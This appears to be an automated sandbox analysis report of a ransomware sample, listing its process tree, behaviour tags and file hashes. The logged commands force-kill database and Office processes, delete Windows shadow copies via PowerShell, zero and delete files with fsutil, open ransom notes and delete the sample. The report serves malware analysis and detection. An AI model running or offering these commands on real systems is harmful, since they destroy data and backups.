C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:316
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:804
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:564
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1484
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1196
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:616
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RECOVERY.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1516
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵PID:1592
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:780
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:1880
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\sample.exe2⤵
- Deletes itself
PID:1764 -
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵PID:1484
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-3439596191425314019-4125160258150192761319059127-809508426-1685777795286717014"1⤵PID:268
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-9295736892041876431229420506148101041-1410211457-1314614114727357354515720437"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\RestoreConnect.xla.trins1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:608 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RestoreConnect.xla.trins2⤵
- Opens file in notepad (likely ransom note)
PID:1276
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5457ae8f12b448de3a2c4bb18146ae744
SHA10ba6ffc29c94e4f04f795b2df28bba23ba350cc9
SHA256cc1ae0b34340478701b48203c553dac85d83ca4ad8639dba01e64d3d4f1788af
SHA51275e3d215aced22fd0249c257f35da84fd4dc2fcce3c69815f55f770486fe1cb6c673e4b08c817e9e78bec2fa0d57ee9cbe8077a01d9e2df660b1899f3134a7a9
-
Filesize
410KB
MD57508f2fd88f4196aeeeee65b19805435
SHA1213f660409f7ee21dd55ce00414c53bebea633dc
SHA256ed40c66f94519096100665682ec7be14108aa1a241c658df5f6736204c79c6f6
SHA512a00d5b4390a4f67ed12abace9b7f79bf7e242684ac8c644ec2bf71641100c549811919d504dca416b539127dc9a849d5beeb2a375b52efab0dcb71c621f00c7d